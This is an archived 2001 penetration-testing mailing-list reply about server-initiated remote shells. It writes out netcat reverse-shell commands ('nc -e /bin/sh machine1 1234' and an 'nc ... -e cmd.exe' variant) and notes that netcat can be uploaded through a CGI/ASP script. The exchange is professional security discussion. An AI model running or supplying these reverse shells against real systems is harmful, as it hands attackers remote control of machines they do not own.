Penetration Testing mailing list archives
RE: Server initiated remote shell
From: Yonatan Bokovza <Yonatan () xpert com>
Date: Sun, 23 Sep 2001 20:36:30 +0300
-----Original Message-----
From: Greg Ardpic [mailto:itb () rootshell be]
Sent: Saturday, September 22, 2001 14:52
To: pen-test () securityfocus com
Subject: Re: Server initiated remote shell

On Fri, 21 Sep 2001, Bill Pennington wrote:

> You want netcat, you can find it on packetstorm. What you will need to do
> first is build a CGI/ASP script to upload your code, assuming you can't
> just tftp it from the internal system. Then on your box execute:
>
> nc -l -p 80
>
> On the remote server execute
>
> nc <yourbox> 80 -e c:\winnt\system32\cmd.exe
>
> or /usr/bin/bash or whatever command interpreter is handy. You will then
> see a command prompt appear on your local box. Sounds like the hard part
> will be getting netcat on the box. Good luck!

Does this work on unix machines? I have compiled netcat with
-DGAPING_SECURITY_HOLE (so I could use the -e switch) but had no luck.
Trivially easy:

On machine1 (windows in this case)

nc -lp 1234

On machine2 (unix in this case)

nc -e /bin/sh machine1 1234

That's really all there is to it. Machine1 could be unix too, with no change
in the commands.

Best Regards,
Yonatan Bokovza
IT Security Consultant
Xpert Systems

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Current thread:
- Server initiated remote shell Ilici Ramirez (Sep 21)
- RE: Server initiated remote shell Steve (Sep 21)
- Re: Server initiated remote shell Bill Pennington (Sep 21)
- Re: Server initiated remote shell Greg Ardpic (Sep 22)
- <Possible follow-ups>
- Re: Server initiated remote shell Mike Brentlinger (Sep 21)
- Re: Server initiated remote shell auto241065 (Sep 22)
- RE: Server initiated remote shell Yonatan Bokovza (Sep 23)
- RE: Server initiated remote shell Emmanuel Gadaix (Sep 24)